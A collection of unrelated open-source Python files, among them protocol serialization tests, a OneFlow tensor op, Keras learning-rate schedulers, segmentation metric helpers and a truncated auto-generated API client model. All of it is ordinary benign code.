({0, 1, 2, 4},
_fromhex('01 17')),
({0, 1, 2, 4, 8},
_fromhex('02 17 01')),
({8, 17, 24, 25, 34, 40, 42, 49, 50},
_fromhex('07 00 01 02 03 04 05 06')),
({8, 17, 24, 25, 34, 40, 42, 49, 50, 56, 57, 58},
_fromhex('08 00 01 02 03 04 05 06 07')),
({8, 17, 24, 25, 34, 40, 42, 49, 50, 56, 57, 58, 67},
_fromhex('09 00 01 02 03 04 05 06 07 08')),
({8, 17, 24, 25, 34, 40, 42, 49, 50, 56, 57, 58, 67, 72, 75},
_fromhex('0A 00 01 02 03 04 05 06 07 08 09')),
({8, 17, 24, 25, 34, 40, 42, 49, 50, 56, 57, 58, 67, 72, 75, 81, 83},
_fromhex('0B 00 01 02 03 04 05 06 07 08 09 0A')),
]
@pytest.mark.parametrize("bitset", bitsets)
def test_bitset(bitset):
bitset, expected_serialized = bitset
deserialized_bitset, buf, consumed = pva.BitSet.deserialize(
expected_serialized, endian='<')
assert consumed == len(expected_serialized)
assert deserialized_bitset == bitset
print('serialized', pva.BitSet(bitset).serialize(endian='<'))
assert b''.join(pva.BitSet(bitset).serialize(endian='<')) == expected_serialized
def test_search():
# uses nonstandard array type, so custom code path
from caproto.pva import SearchRequestLE
addr = '127.0.0.1'
pv = 'TST:image1:Array'
channel1 = {'id': 0x01, 'channel_name': pv}
req = SearchRequestLE(
sequence_id=1,
flags=(pva.SearchFlags.reply_required | pva.SearchFlags.unicast),
response_address=(addr, 8080),
protocols=['tcp'],
channels=[channel1],)
# NOTE: cache needed here to give interface for channels
cache = pva.CacheContext()
serialized = req.serialize(cache=cache)
assert req.response_address == addr
assert req.channel_count == 1
assert serialized == (
b'\x01\x00\x00\x00\x81\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\xff\xff\x7f\x00\x00\x01\x90\x1f'
b'\x01\x03tcp\x01\x00\x01\x00\x00\x00'
b'\x10TST:image1:Array'
)
deserialized, buf, consumed = SearchRequestLE.deserialize(
bytearray(serialized), cache=cache)
assert consumed == len(serialized)
assert deserialized.channel_count == 1
assert deserialized.channels == [channel1]
assert deserialized.response_address == addr
channel2 = {'id': 0x02, 'channel_name': pv + '2'}
req.channels = [channel1, channel2]
serialized = req.serialize(cache=cache)
assert req.channel_count == 2
assert serialized == (
b'\x01\x00\x00\x00\x81\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\xff\xff\x7f\x00\x00\x01\x90\x1f'
b'\x01\x03tcp'
b'\x02\x00'
b'\x01\x00\x00\x00'
b'\x10TST:image1:Array'
b'\x02\x00\x00\x00'
b'\x11TST:image1:Array2'
)
deserialized, buf, consumed = SearchRequestLE.deserialize(
bytearray(serialized), cache=cache)
assert consumed == len(serialized)
assert deserialized.channel_count == 2
assert deserialized.channels == [channel1, channel2]
def test_broadcaster_messages_smoke():
bcast = pva.Broadcaster(our_role=pva.Role.SERVER, broadcast_port=5,
server_port=6)
pv_to_cid, request = bcast.search(['abc', 'def'])
request.serialize()
response = bcast.search_response(pv_to_cid={'abc': 5, 'def': 6})
response.serialize()
def test_qos_flags_encode():
assert pva.QOSFlags.decode(
pva.QOSFlags.encode(priority=0, flags=pva.QOSFlags.low_latency)
) == (0, pva.QOSFlags.low_latency)
|
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community Edition) available.
Copyright (C) 2017-2019 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
""" # noqa
from pipeline.service.pipeline_engine_adapter.adapter_api import run_pipeline
from pipeline.parser.pipeline_parser import PipelineParser, WebPipelineAdapter
from pipeline.utils.uniqid import uniqid, node_uniqid
from .new_data_for_test import (
PIPELINE_DATA,
WEB_PIPELINE_WITH_SUB_PROCESS2
)
def test_run_serial_pipeline():
pipeline = PIPELINE_DATA
parser_obj = PipelineParser(pipeline)
run_pipeline(parser_obj.parser())
def test_run_sub_pipeline2():
pipeline = WEB_PIPELINE_WITH_SUB_PROCESS2
parser_obj = WebPipelineAdapter(pipeline)
run_pipeline(parser_obj.parser())
def main_test():
id_list = [node_uniqid() for i in xrange(100)]
pipe1 = {
'id': id_list[0],
'name': 'name',
'start_event': {
'id': id_list[1],
'name': 'start',
'type': 'EmptyStartEvent',
'incoming': None,
'outgoing': id_list[2]
},
'end_event': {
'id': id_list[53],
'name': 'end',
'type': 'EmptyEndEvent',
'incoming': id_list[52],
'outgoing': None
},
'activities': {
},
'flows': { # 存放该 Pipeline 中所有的线
},
'gateways': { # 这里存放着网关的详细信息
},
'data': {
'inputs': {
},
'outputs': {
},
}
}
for i in xrange(2, 51, 2):
pipe1['flows'][id_list[i]] = {
'id': id_list[i],
'source': id_list[i - 1],
'target': id_list[i + 1]
}
pipe1['activities'][id_list[i + 1]] = {
'id': id_list[i + 1],
'type': 'ServiceActivity',
'name': 'first_task',
'incoming': id_list[i],
'outgoing': id_list[i + 2],
'component': {
'code': 'demo',
'inputs': {
'input_test': {
'type': 'plain',
'value': '2',
},
'radio_test': {
'type': 'plain',
'value': '1',
},
},
}
}
pipe1['flows'][id_list[52]] = {
'id': id_list[52],
'source': id_list[52 - 1],
'target': id_list[52 + 1]
}
parser_obj = PipelineParser(pipe1)
run_pipeline(parser_obj.parser())
|
""" A universal module with functions / classes without dependencies. """
import functools
import re
import os
_sep = os.path.sep
if os.path.altsep is not None:
_sep += os.path.altsep
_path_re = re.compile(r'(?:\.[^{0}]+|[{0}]__init__\.py)$'.format(re.escape(_sep)))
del _sep
def to_list(func):
def wrapper(*args, **kwargs):
return list(func(*args, **kwargs))
return wrapper
def to_tuple(func):
def wrapper(*args, **kwargs):
return tuple(func(*args, **kwargs))
return wrapper
def unite(iterable):
"""Turns a two dimensional array into a one dimensional."""
return set(typ for types in iterable for typ in types)
class UncaughtAttributeError(Exception):
"""
Important, because `__getattr__` and `hasattr` catch AttributeErrors
implicitly. This is really evil (mainly because of `__getattr__`).
Therefore this class originally had to be derived from `BaseException`
instead of `Exception`. But because I removed relevant `hasattr` from
the code base, we can now switch back to `Exception`.
:param base: return values of sys.exc_info().
"""
def safe_property(func):
return property(reraise_uncaught(func))
def reraise_uncaught(func):
"""
Re-throw uncaught `AttributeError`.
Usage: Put ``@rethrow_uncaught`` in front of the function
which does **not** suppose to raise `AttributeError`.
AttributeError is easily get caught by `hasattr` and another
``except AttributeError`` clause. This becomes problem when you use
a lot of "dynamic" attributes (e.g., using ``@property``) because you
can't distinguish if the property does not exist for real or some code
inside of the "dynamic" attribute through that error. In a well
written code, such error should not exist but getting there is very
difficult. This decorator is to help us getting there by changing
`AttributeError` to `UncaughtAttributeError` to avoid unexpected catch.
This helps us noticing bugs earlier and facilitates debugging.
"""
@functools.wraps(func)
def wrapper(*args, **kwds):
try:
return func(*args, **kwds)
except AttributeError as e:
raise UncaughtAttributeError(e) from e
return wrapper
class PushBackIterator:
def __init__(self, iterator):
self.pushes = []
self.iterator = iterator
self.current = None
def push_back(self, value):
self.pushes.append(value)
def __iter__(self):
return self
def __next__(self):
if self.pushes:
self.current = self.pushes.pop()
else:
self.current = next(self.iterator)
return self.current
|
from math import sqrt
n = int(input('Digite um número: '))
d = n * 2
t = n * 3
r = sqrt(n)
print('O dobro de {} é {}\nO triplo de {} é {}'.format(n, d, n, t))
print('A raiz quadrada de {} é {}.'.format(n, r))
|
"""
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from typing import Optional, Sequence
import oneflow as flow
from oneflow.nn.module import Module
def _calc_broadcast_axes(x, like_tensor):
num_prepend = len(like_tensor.shape) - len(x.shape)
prepend_shape = [1] * num_prepend + list(x.shape)
broadcast_axes = [x for x in range(num_prepend)]
for i in range(num_prepend, len(prepend_shape)):
if prepend_shape[i] != like_tensor.shape[i]:
if prepend_shape[i] != 1:
raise RuntimeError(
f"output with shape {x.shape} doesn't match the broadcast shape {like_tensor.shape}"
)
else:
broadcast_axes.append(i)
return tuple(broadcast_axes)
class BroadCastLike(Module):
def __init__(self, broadcast_axes: Optional[Sequence] = None) -> None:
super().__init__()
self.broadcast_axes = broadcast_axes
def forward(self, x, like_tensor):
if self.broadcast_axes is None:
broadcast_axes = _calc_broadcast_axes(x, like_tensor)
else:
broadcast_axes = self.broadcast_axes
return flow._C.broadcast_like(x, like_tensor, broadcast_axes=broadcast_axes)
def broadcast_like_op(x, like_tensor, broadcast_axes: Optional[Sequence] = None):
"""This operator broadcast tensor `x` to `like_tensor` according to the broadcast_axes.
Args:
x (Tensor): The input Tensor.
like_tensor (Tensor): The like Tensor.
broadcast_axes (Optional[Sequence], optional): The axes you want to broadcast. Defaults to None.
Returns:
[Tensor]: Broadcasted input Tensor.
For example:
.. code:: python
>>> import oneflow as flow
>>> x = flow.randn(3, 1, 1)
>>> like_tensor = flow.randn(3, 4, 5)
>>> broadcast_tensor = flow.broadcast_like(x, like_tensor, broadcast_axes=[1, 2])
>>> broadcast_tensor.shape
oneflow.Size([3, 4, 5])
"""
return BroadCastLike(broadcast_axes=broadcast_axes)(x, like_tensor)
|
import tkinter as tk
from tkinter import ttk
app = tk.Tk()
def rb_click():
print()
country = tk.IntVar()
rb1 = tk.Radiobutton(app, text='Russia', value=1, variable=country, padx=15, pady=10, command=rb_click)
rb1.grid(row=1, column=0, sticky=tk.W)
rb2 = tk.Radiobutton(app, text='USA', value=2, variable=country, padx=15, pady=10)
rb2.grid(row=2, column=0, sticky=tk.W)
app.mainloop() |
from django.apps import AppConfig
class DevconnectorConfig(AppConfig):
name = 'devconnector'
|
from __future__ import print_function
from io import StringIO
from argparse import ArgumentParser
from os.path import join as osp_join
import sys
from catkin_tools.verbs.catkin_build import (
prepare_arguments as catkin_build_prepare_arguments,
main as catkin_build_main,
)
from catkin_tools.verbs.catkin_locate import (
prepare_arguments as catkin_locate_prepare_arguments,
main as catkin_locate_main,
)
from .build_compile_cmd import append_cmake_compile_commands, combine_compile_commands
def prepare_arguments(parser):
parser = catkin_build_prepare_arguments(parser)
parser.description = (
parser.description
+ "After the build is finished, create compile commands in root workspace"
)
return parser
def main(opts):
append_cmake_compile_commands(opts)
err = catkin_build_main(opts)
if err != 0:
return err # exit if failed
# Figure out where's the catkin workspace
catkin_locate_opts = catkin_locate_prepare_arguments(ArgumentParser()).parse_args()
catkin_locate_opts.package = None
if opts.workspace is not None:
catkin_locate_opts.workspace = opts.workspace
# Redirect stdout to string
original_stdout = sys.stdout
sys.stdout = stringio = StringIO()
# call locate workspace
catkin_locate_main(catkin_locate_opts)
pth = stringio.getvalue().splitlines()[0]
# revert stdout & cleanup
sys.stdout = original_stdout
del stringio
combine_compile_commands(pth, osp_join(pth, "build"))
|
# -*- coding: utf-8; -*-
# Copyright (c) 2017, Daniel Falci - danielfalci@gmail.com
# Laboratory for Advanced Information Systems - LAIS
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of deep_pt_srl nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from keras import backend as K
from keras.callbacks import *
import numpy as np
class LrReducer(object):
def __init__(self, trainingEpochs):
self.trainingEpochs = trainingEpochs
self.bestF1 = 0
self.reductions = 0
self.bestEpoch = 0
self.currentEpoch = 0
def setNetwork(self, nn):
self.nn = nn
def registerScore(self, newF1, epoch):
self.currentEpoch = epoch
if newF1 > self.bestF1:
self.bestF1 = newF1
print 'NEW BEST F1 : {}'.format(self.bestF1)
return True
return False
def onEpochEnd(self, f1, epoch):
pass
def setParameters(self, options):
pass
def getLearningRate(self):
return K.get_value(self.nn.optimizer.lr)
def calculateNewLr(self):
pass
def setLearningRate(self, new_lr):
print 'NEW LEARNING RATE : {}'.format(new_lr)
K.set_value(self.nn.optimizer.lr, new_lr)
class RateBasedLrReducer(LrReducer):
def __init__(self, trainingEpochs):
super(RateBasedLrReducer, self).__init__(trainingEpochs)
def onEpochEnd(self, f1, epoch):
self.registerScore(f1, epoch)
self.calculateNewLr()
def calculateNewLr(self):
lr = self.getLearningRate()
decay = lr * float(self.currentEpoch) / (self.trainingEpochs)
new_lr = lr * 1/(1 + decay * self.currentEpoch)
self.setLearningRate(new_lr)
class FixedBasedLrReducer(LrReducer):
def __init__(self, trainingEpochs):
super(FixedBasedLrReducer, self).__init__(trainingEpochs)
self.changeEpochs = [28, 35, 40, 47]
self.lr = [0.0005, 0.0003, 0.0001, 0.00005]
self.current = -1
def onEpochEnd(self, f1, epoch):
if epoch in self.changeEpochs:
self.calculateNewLr()
def calculateNewLr(self):
self.current = self.current+1
new_lr = self.lr[self.current]
print 'changing lr to : {}'.format(new_lr)
self.setLearningRate(new_lr)
self.reductions +=1
class PatienceBaseLrReducer(LrReducer):
def __init__(self, trainingEpochs, patience, reduceRate):
super(PatienceBaseLrReducer, self).__init__(trainingEpochs)
self.roundsAwaiting = 0
self.reduceRate = reduceRate
self.patience = patience
self.maxReductions = 30
self.reductions = 0
print '{} - {}'.format(self.reduceRate, self.patience)
def onEpochEnd(self, f1, epoch):
if self.registerScore(f1, epoch):
self.roundsAwaiting = 0
else:
if self.roundsAwaiting > self.patience and self.reductions < self.maxReductions:
self.calculateNewLr()
self.roundsAwaiting = 0
else:
self.roundsAwaiting += 1
print 'rounds awaiting : {}'.format(self.roundsAwaiting)
def calculateNewLr(self):
lr = self.getLearningRate()
new_lr = lr * self.reduceRate
print 'NEW LEARNING RATE : {}'.format(lr)
self.setLearningRate(new_lr)
self.reductions +=1
class CyclicLearningRate(Callback):
def __init__(self, base_lr=0.001, max_lr=0.006, step_size=2000., mode='triangular2', gamma=1., scale_fn=None, scale_mode='cycle'):
super(CyclicLearningRate, self).__init__()
self.base_lr = base_lr
self.max_lr = max_lr
self.step_size = step_size
self.mode = mode
self.gamma = gamma
if scale_fn == None:
if self.mode == 'triangular':
self.scale_fn = lambda x: 1.
self.scale_mode = 'cycle'
elif self.mode == 'triangular2':
self.scale_fn = lambda x: 1/(2.**(x-1))
self.scale_mode = 'cycle'
elif self.mode == 'exp_range':
self.scale_fn = lambda x: gamma**(x)
self.scale_mode = 'iterations'
else:
self.scale_fn = scale_fn
self.scale_mode = scale_mode
self.clr_iterations = 0.
self.trn_iterations = 0.
self.history = {}
self._reset()
def _reset(self, new_base_lr=None, new_max_lr=None, new_step_size=None):
if new_base_lr != None:
self.base_lr = new_base_lr
if new_max_lr != None:
self.max_lr = new_max_lr
if new_step_size != None:
self.step_size = new_step_size
self.clr_iterations = 0.
def clr(self):
cycle = np.floor(1+self.clr_iterations/(2*self.step_size))
x = np.abs(self.clr_iterations/self.step_size - 2*cycle + 1)
if self.scale_mode == 'cycle':
return self.base_lr + (self.max_lr-self.base_lr)*np.maximum(0, (1-x))*self.scale_fn(cycle)
else:
return self.base_lr + (self.max_lr-self.base_lr)*np.maximum(0, (1-x))*self.scale_fn(self.clr_iterations)
def on_train_begin(self, logs={}):
logs = logs or {}
if self.clr_iterations == 0:
print 'learning rate : {}'.format(self.base_lr)
K.set_value(self.model.optimizer.lr, self.base_lr)
else:
K.set_value(self.model.optimizer.lr, self.clr())
def on_batch_end(self, epoch, logs=None):
logs = logs or {}
self.trn_iterations += 1
self.clr_iterations += 1
K.set_value(self.model.optimizer.lr, self.clr())
self.history.setdefault('lr', []).append(K.get_value(self.model.optimizer.lr))
self.history.setdefault('iterations', []).append(self.trn_iterations)
for k, v in logs.items():
self.history.setdefault(k, []).append(v)
def captureOptimizerLR(nn):
return K.get_value(nn.optimizer.lr)
if __name__ == '__main__':
trainingEpochs = 300
lr = 0.001
#decay = 0.001
temp = []
for epoch in xrange(1, trainingEpochs):
decay = lr * (float(epoch) / trainingEpochs)
lr = lr * 1/(1 + decay * epoch)
print lr
temp.append(lr)
from pylab import *
plot(temp)
xlabel('time')
ylabel('learning rate')
title('Learning rate decay')
grid(True)
show()
|
from zerocon import IOException
from benchutils import getInterface, getSeries
from threading import Thread
import time, Queue
class Emitter(Thread):
def __init__(self, queue):
Thread.__init__(self)
self.queue = queue
def run(self):
while True:
time.sleep(1)
self.queue.put(time.time())
class TestThread(Thread):
def __init__(self, x):
Thread.__init__(self)
self.x = x
self.ifc = getInterface()
self.sd, self.head = getSeries(self.ifc, 'x'+str(x))
self.collector = Queue.Queue()
def run(self):
Emitter(self.collector).start()
head = self.head
while True:
issued_on = self.collector.get(True)
started_on = time.time()
while True:
try:
self.ifc.writeSeries(self.sd, head, head+1, ' ')
except IOException:
self.ifc.close()
self.ifc = getInterface()
else:
break
stopped_on = time.time()
with open('/%s' % (self.x, ), 'a') as f:
f.write('%s %s %s\n' % (issued_on, started_on, stopped_on))
head += 1
self.ifc.close()
threads = [TestThread(x) for x in xrange(0, 10)]
[thread.start() for thread in threads]
raw_input()
|
# import numpy as np
# import torch
# from medpy import metric
# from scipy.ndimage import zoom
# import torch.nn as nn
# import cv2
# import SimpleITK as sitk
#
# import matplotlib.pyplot as plt
# import tensorflow as tf
# import matplotlib.pylab as pl
# from matplotlib.colors import ListedColormap
#
#
# device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
# class DiceLoss(nn.Module):
# def __init__(self, n_classes):
# super(DiceLoss, self).__init__()
# self.n_classes = n_classes
#
# def _one_hot_encoder(self, input_tensor):
# tensor_list = []
# for i in range(self.n_classes):
# temp_prob = input_tensor == i # * torch.ones_like(input_tensor)
# tensor_list.append(temp_prob.unsqueeze(1))
# output_tensor = torch.cat(tensor_list, dim=1)
# return output_tensor.float()
#
# def _dice_loss(self, score, target):
# target = target.float()
# smooth = 1e-5
# intersect = torch.sum(score * target)
# y_sum = torch.sum(target * target)
# z_sum = torch.sum(score * score)
# loss = (2 * intersect + smooth) / (z_sum + y_sum + smooth)
# loss = 1 - loss
# return loss
#
# def forward(self, inputs, target, weight=None, softmax=False):
# if softmax:
# inputs = torch.softmax(inputs, dim=1)
# # own
# #target = self._one_hot_encoder(target)
# target=target[:,:,:,0]+target[:,:,:,1]+target[:,:,:,2]
# inputs=inputs[:,0,:,:,]+inputs[:,1,:,:,]
# if weight is None:
# weight = [1] * self.n_classes
# assert inputs.size() == target.size(), 'predict {} & target {} shape do not match'.format(inputs.size(), target.size())
# class_wise_dice = []
# loss = 0.0
# for i in range(0, self.n_classes):
# dice = self._dice_loss(inputs[:, i], target[:, i])
# class_wise_dice.append(1.0 - dice.item())
# loss += dice * weight[i]
# return loss / self.n_classes
#
#
# def calculate_metric_percase(pred, gt):
# pred[pred > 0] = 1
# gt[gt > 0] = 1
# if pred.sum() > 0 and gt.sum()>0:
# dice = metric.binary.dc(pred, gt)
# hd95 = metric.binary.hd95(pred, gt)
# return dice, hd95
# elif pred.sum() > 0 and gt.sum()==0:
# return 1, 0
# else:
# return 0, 0
#
#
# def test_single_volume(image, label, net, classes, patch_size=[256, 256], test_save_path=None, case=None, z_spacing=1):
# image, label = image.squeeze(0).cpu().detach().numpy(), label.squeeze(0).cpu().detach().numpy()
# if len(image.shape) == 3:
# prediction = np.zeros_like(label)
# for ind in range(image.shape[0]):
# slice = image[ind, :, :]
# x, y = slice.shape[0], slice.shape[1]
# if x != patch_size[0] or y != patch_size[1]:
# slice = zoom(slice, (patch_size[0] / x, patch_size[1] / y), order=3) # previous using 0
# # our
# input = torch.from_numpy(slice).unsqueeze(0).float().to(device)
# # origin
# # input = torch.from_numpy(slice).unsqueeze(0).unsqueeze(0).float().to(device)
# net.eval()
# with torch.no_grad():
# outputs = net(input)
# # our
# out = torch.argmax(torch.sigmoid(outputs), dim=1).squeeze(0)
# # origin
# #out = torch.argmax(torch.softmax(outputs, dim=1), dim=1).squeeze(0)
# out = out.cpu().detach().numpy()
# if x != patch_size[0] or y != patch_size[1]:
# pred = zoom(out, (x / patch_size[0], y / patch_size[1]), order=0)
# else:
# pred = out
# prediction[ind] = pred
# prediction=prediction[0]
# else:
# # our1
# #input = torch.from_numpy(image).unsqueeze(0).float().to(device)
# # our2
# input=torch.from_numpy(image).unsqueeze(0).unsqueeze(0).float().to(device)
# # origin
# #input = torch.from_numpy(image).unsqueeze(0).unsqueeze(0).float().to(device)
#
# net.eval()
# with torch.no_grad():
# out = torch.argmax(torch.softmax(net(input), dim=1), dim=1).squeeze(0)
# prediction = out.cpu().detach().numpy()
# metric_list = []
# print("jj")
# for i in range(1, classes):
# metric_list.append(calculate_metric_percase(prediction == i, label == i))
# # origin
# # if test_save_path is not None:
# # img_itk = sitk.GetImageFromArray(image.astype(np.float32))
# # prd_itk = sitk.GetImageFromArray(prediction.astype(np.float32))
# # lab_itk = sitk.GetImageFromArray(label.astype(np.float32))
# # img_itk.SetSpacing((1, 1, z_spacing))
# # prd_itk.SetSpacing((1, 1, z_spacing))
# # lab_itk.SetSpacing((1, 1, z_spacing))
# # sitk.WriteImage(prd_itk, test_save_path + '/'+case + "_pred.nii.gz")
# # sitk.WriteImage(img_itk, test_save_path + '/'+ case + "_img.nii.gz")
# # sitk.WriteImage(lab_itk, test_save_path + '/'+ case + "_gt.nii.gz")
# # our
# if test_save_path is not None:
# cv2.imwrite(test_save_path + "/" +case +".png",prediction*255)
# return metric_list
#
# def visualize(X, y, y_pred, sample_num, figsize=(10, 10), cmap='viridis'):
# y_pred_np = y_pred[sample_num, :, :, :]
# y_class = np.argmax(y_pred_np, axis=-1)
# x = X.numpy()[sample_num, :, :, :]
# y_np = y.numpy()[sample_num, :, :, :]
# y_np = np.argmax(y_np, axis=-1)
# fig, axis = plt.subplots(1, 2, figsize=figsize)
# axis[0].imshow(x, cmap='gray')
# axis[0].imshow(y_np, cmap=cmap, alpha=0.3)
# axis[0].set_title("original labels")
# axis[1].imshow(x, cmap='gray')
# axis[1].imshow(y_class, cmap=cmap, alpha=0.3)
# axis[1].set_title("predicted labels")
# plt.show()
#
#
# def visualize_non_empty_predictions(X, y, models, figsize=(10, 10), cmap=pl.cm.tab10_r, alpha=0.8, titles=[]):
# x = X.numpy()
# y_np = y.numpy()
# y_np = np.argmax(y_np, axis=-1)
# labels = np.unique(y_np)
# if len(labels) != 1:
# # create cmap
# my_cmap = cmap(np.arange(cmap.N))
# my_cmap[:, -1] = 0.9
# my_cmap[0, -1] = 0.1
# my_cmap = ListedColormap(my_cmap)
#
# n_plots = len(models) + 1
# fig, axis = plt.subplots(1, n_plots, figsize=figsize)
#
# axis[0].imshow(x, cmap='gray')
# axis[0].imshow(y_np, cmap=my_cmap, alpha=alpha)
# axis[0].set_title("original labels")
# axis[0].set_xticks([])
# axis[0].set_yticks([])
#
# for i, model in enumerate(models):
# y_pred = model.model.predict(tf.expand_dims(X, axis=0))
# y_class = np.argmax(y_pred, axis=-1)
# axis[i+1].imshow(x, cmap='gray')
# axis[i+1].imshow(y_class[0], cmap=my_cmap, alpha=alpha)
# if titles == []:
# axis[i+1].set_title(f"{model.name}")
# else:
# axis[i+1].set_title(f"{titles[i]}")
# axis[i+1].set_xticks([])
# axis[i+1].set_yticks([])
#
# plt.show()
import numpy as np
import torch
from medpy import metric
from scipy.ndimage import zoom
import torch.nn as nn
import SimpleITK as sitk
import cv2
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
class DiceLoss(nn.Module):
def __init__(self, n_classes):
super(DiceLoss, self).__init__()
self.n_classes = n_classes
def _one_hot_encoder(self, input_tensor):
tensor_list = []
for i in range(self.n_classes):
temp_prob = input_tensor == i # * torch.ones_like(input_tensor)
tensor_list.append(temp_prob.unsqueeze(1))
output_tensor = torch.cat(tensor_list, dim=1)
return output_tensor.float()
def _dice_loss(self, score, target):
target = target.float()
smooth = 1e-5
intersect = torch.sum(score * target)
y_sum = torch.sum(target * target)
z_sum = torch.sum(score * score)
loss = (2 * intersect + smooth) / (z_sum + y_sum + smooth)
loss = 1 - loss
return loss
def forward(self, inputs, target, weight=None, softmax=False):
if softmax:
inputs = torch.softmax(inputs, dim=1)
target = self._one_hot_encoder(target)
if weight is None:
weight = [1] * self.n_classes
assert inputs.size() == target.size(), 'predict {} & target {} shape do not match'.format(inputs.size(), target.size())
class_wise_dice = []
loss = 0.0
for i in range(0, self.n_classes):
dice = self._dice_loss(inputs[:, i], target[:, i])
class_wise_dice.append(1.0 - dice.item())
loss += dice * weight[i]
return loss / self.n_classes
def calculate_metric_percase(pred, gt):
pred[pred > 0] = 1
gt[gt > 0] = 1
if pred.sum() > 0 and gt.sum()>0:
# our
gt=gt[:,:,1]
dice = metric.binary.dc(pred, gt)
hd95 = metric.binary.hd95(pred, gt)
return dice, hd95
elif pred.sum() > 0 and gt.sum()==0:
return 1, 0
else:
return 0, 0
def test_single_volume(image, label, net, classes, patch_size=[256, 256], test_save_path=None, case=None, z_spacing=1):
image, label = image.squeeze(0).cpu().detach().numpy(), label.squeeze(0).cpu().detach().numpy()
if len(image.shape) == 3:
prediction = np.zeros_like(image)
for ind in range(image.shape[0]):
slice = image[ind, :, :]
x, y = slice.shape[0], slice.shape[1]
if x != patch_size[0] or y != patch_size[1]:
slice = zoom(slice, (patch_size[0] / x, patch_size[1] / y), order=3) # previous using 0
input = torch.from_numpy(slice).unsqueeze(0).unsqueeze(0).float().to(device)
net.eval()
with torch.no_grad():
outputs = net(input)
# out = torch.argmax(torch.softmax(outputs, dim=1), dim=1).squeeze(0)
out = torch.argmax(torch.sigmoid(outputs), dim=1).squeeze(0)
out = out.cpu().detach().numpy()
if x != patch_size[0] or y != patch_size[1]:
pred = zoom(out, (x / patch_size[0], y / patch_size[1]), order=0)
else:
pred = out
prediction[ind] = pred
prediction = prediction[0]
else:
input = torch.from_numpy(image).unsqueeze(
0).unsqueeze(0).float().to(device)
net.eval()
with torch.no_grad():
out = torch.argmax(torch.softmax(net(input), dim=1), dim=1).squeeze(0)
prediction = out.cpu().detach().numpy()
metric_list = []
for i in range(1, classes):
metric_list.append(calculate_metric_percase(prediction == i, label == i))
# if test_save_path is not None:
# img_itk = sitk.GetImageFromArray(image.astype(np.float32))
# prd_itk = sitk.GetImageFromArray(prediction.astype(np.float32))
# lab_itk = sitk.GetImageFromArray(label.astype(np.float32))
# img_itk.SetSpacing((1, 1, z_spacing))
# prd_itk.SetSpacing((1, 1, z_spacing))
# lab_itk.SetSpacing((1, 1, z_spacing))
# sitk.WriteImage(prd_itk, test_save_path + '/'+case + "_pred.nii.gz")
# sitk.WriteImage(img_itk, test_save_path + '/'+ case + "_img.nii.gz")
# sitk.WriteImage(lab_itk, test_save_path + '/'+ case + "_gt.nii.gz")
if test_save_path is not None:
print(test_save_path + '/'+case + '.png')
cv2.imwrite(test_save_path + '/'+case + '.png', prediction*255)
return metric_list
|
# coding: utf-8
"""
Neucore API
Client library of Neucore API # noqa: E501
The version of the OpenAPI document: 1.14.0
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from neucore_api.configuration import Configuration
class GroupApplication(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'id': 'int',
'player': 'Player',
'group': 'Group',
'created': 'datetime',
'status': 'str'
}
attribute_map = {
'id': 'id',
'player': 'player',
'group': 'group',
'created': 'created',
'status': 'status'
}
def __init__(self, id=None, player=None, group=None, created=None, status=None, local_vars_configuration=None): # noqa: E501
"""GroupApplication - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._id = None
self._player = None
self._group = None
self._created = None
self._status = None
self.discriminator = None
self.id = id
self.player = player
self.group = group
self.created = created
if status is not None:
self.status = status
@property
def id(self):
"""Gets the id of this GroupApplication. # noqa: E501
:return: The id of this GroupApplication. # noqa: E501
:rtype: int
"""
return self._id
@id.setter
